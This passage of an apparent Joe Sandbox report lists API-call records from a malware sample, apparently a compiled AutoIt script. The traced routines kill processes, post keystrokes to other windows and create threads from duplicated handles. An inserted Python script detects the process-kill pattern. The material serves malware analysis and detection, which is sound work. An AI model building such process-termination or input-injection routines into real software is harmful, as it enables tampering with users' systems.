• Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A
APIs
  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
  • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
• lstrcmpiW.KERNEL32(?,?), ref: 00464D40
• _wcscmp.LIBCMT ref: 00464D5A
• MoveFileW.KERNEL32(?,?), ref: 00464D75
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
• Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
• Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
• Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
• Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
• Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
• Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
• Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
• DestroyIcon.USER32(00000000), ref: 0043C37F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
• DestroyIcon.USER32(?), ref: 0043C3AB
  • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
APIs
  • Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
  • Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
  • Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
• MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
• MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
• HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
• GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
• DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
• GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
• DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
• CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
APIs
  • Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
  • Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
  • Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
  • Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
• _memset.LIBCMT ref: 00479813
• _memset.LIBCMT ref: 00479956
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
• CoTaskMemFree.OLE32(?), ref: 0047998D
Strings
• NULL Pointer assignment, xrefs: 004799DB
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
• SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
• _wcscat.LIBCMT ref: 00486EAD
• SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                                                  • String ID: SysListView32
                                                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                                                  • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                                                                                  • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                                                                                                                                  • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                                                                                  • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                                                                                                                                    • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                                                                                                                                    • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0047E9B7
                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                                  • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                                                                                  • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                                                                                                                                  • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                                                                                  • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                                                                                                                                  APIs
                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconLoad
                                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                                  • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                                                                                  • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                                                                                                                                  • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                                                                                  • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00464319
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00464336
                                                                                                                                                  • _wprintf.LIBCMT ref: 0046435C
                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                                                                                                                  Strings
                                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                                                  • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                                                                                  • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                                                                                                                                  • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                                                                                  • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
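The two records above, the process-termination routine at 0047E9A4..0047EAA3 (Toolhelp enumeration in the subcall, OpenProcess with desired access 00000001, TerminateProcess, associated string SeDebugPrivilege) and the runtime-error dialog at 00464312..0046437A (LoadStringW, _wprintf with the "%s (%d) : ==> %s: %s %s" format, MessageBoxW with uType 00011010), list raw API calls with hex arguments. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses API lines in that format, decodes the OpenProcess access mask and the MessageBoxW uType, and flags the enumerate / open-for-terminate / TerminateProcess sequence. The two sample records are copied from this page; the constant tables are assumptions taken from the Win32 headers and cover only the values seen here.

```python
"""Parse Joe Sandbox function-record API lines and decode two of their arguments.

Added example, not part of the Joe Sandbox report or of the analysed sample.
The two sample records are copied from this page; the constant tables are
assumptions taken from the Win32 headers and cover only the values seen here.
"""
import re
from collections import namedtuple

ApiCall = namedtuple("ApiCall", "api module args ref subcall")

# One API line of a function record, e.g.
#   • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
#   • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Constructed from the function at 0047E9A4..0047EAA3 on this page.
KILL_RECORD = """\
  • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
  • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
  • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
• GetLastError.KERNEL32 ref: 0047E9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
• GetLastError.KERNEL32(00000000), ref: 0047EA6E
• CloseHandle.KERNEL32(00000000), ref: 0047EAA3
"""

# Constructed from the function at 00464312..0046437A on this page.
ERROR_BOX_RECORD = """\
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
• LoadStringW.USER32(00000000), ref: 00464319
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
• LoadStringW.USER32(00000000), ref: 00464336
• _wprintf.LIBCMT ref: 0046435C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
"""

# Assumed from winnt.h / winuser.h; only the values this page uses.
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0008: "PROCESS_VM_OPERATION",
                  0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                  0x0400: "PROCESS_QUERY_INFORMATION"}
MB_BUTTONS = {0x0: "MB_OK", 0x1: "MB_OKCANCEL", 0x4: "MB_YESNO"}
MB_ICON = {0x10: "MB_ICONERROR", 0x20: "MB_ICONQUESTION",
           0x30: "MB_ICONWARNING", 0x40: "MB_ICONINFORMATION"}
MB_BITS = {0x1000: "MB_SYSTEMMODAL", 0x10000: "MB_SETFOREGROUND"}


def _arg(tok):
    """'?' marks an argument the sandbox could not resolve; keep it as None."""
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)


def parse_record(text):
    """Return the ApiCall entries of one function record, in report order."""
    calls = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue  # 'Strings', 'Memory Dump Source' and similar lines
        args = tuple(_arg(t) for t in m["args"].split(",")) if m["args"] is not None else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def decode_process_access(mask):
    """Names of the PROCESS_* rights set in an OpenProcess desired-access mask."""
    names = [n for bit, n in PROCESS_ACCESS.items() if mask & bit]
    rest = mask & ~sum(PROCESS_ACCESS)
    if rest:
        names.append("0x%X" % rest)
    return names


def decode_messagebox_type(utype):
    """Split a MessageBoxW uType into button, icon and modality/foreground flags."""
    names = [MB_BUTTONS.get(utype & 0xF, "MB_BUTTONS_0x%X" % (utype & 0xF))]
    icon = utype & 0xF0  # the icon is a 4-bit field, not a set of bits
    if icon:
        names.append(MB_ICON.get(icon, "MB_ICON_0x%X" % icon))
    names += [n for bit, n in MB_BITS.items() if utype & bit]
    return names


def messagebox_types(calls):
    """Decoded uType for every MessageBoxW call whose 4th argument was resolved."""
    return [decode_messagebox_type(c.args[3]) for c in calls
            if c.api == "MessageBoxW" and len(c.args) > 3 and c.args[3] is not None]


def kill_process_pattern(calls):
    """True when the record enumerates processes with Toolhelp, opens one with
    PROCESS_TERMINATE and calls TerminateProcess, the shape seen at
    0047E9A4..0047EAA3. Subcall lines count: the enumeration lives there."""
    apis = {c.api for c in calls}
    enumerates = "CreateToolhelp32Snapshot" in apis and any(a.startswith("Process32") for a in apis)
    opens_to_kill = any(c.api == "OpenProcess" and c.args and c.args[0] is not None
                        and c.args[0] & 0x1 for c in calls)
    return enumerates and opens_to_kill and "TerminateProcess" in apis


if __name__ == "__main__":
    for name, rec in (("kill", KILL_RECORD), ("errbox", ERROR_BOX_RECORD)):
        calls = parse_record(rec)
        print(name, len(calls), "calls; kill pattern:", kill_process_pattern(calls),
              "; MessageBox types:", messagebox_types(calls))
```

The decoded uType, MB_OK with MB_ICONERROR, MB_SYSTEMMODAL and MB_SETFOREGROUND, together with the "%s (%d) : ==> %s: %s %s" format string, is the shape of an AutoIt script runtime-error box, consistent with the "compiled AutoIt script" signature at the top of the report; the kill routine's desired access of exactly PROCESS_TERMINATE is what distinguishes a deliberate process kill from the broader PROCESS_ALL_ACCESS opens seen in injection code.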
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                                                                                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                                                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                                                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                                                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                                                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1211466189-0
                                                                                                                                                  • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                                                                                  • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                                                                                                                                                  • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                                                                                  • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                                                                                                                                                  APIs
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ShowWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                                  • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                                                                                  • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                                                                                                                                                  • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                                                                                  • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                                                                                                                                                  APIs
                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                                                                                                                    • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                    • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                                                                                                                  • _memmove.LIBCMT ref: 0046717E
                                                                                                                                                  • _memmove.LIBCMT ref: 0046719B
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
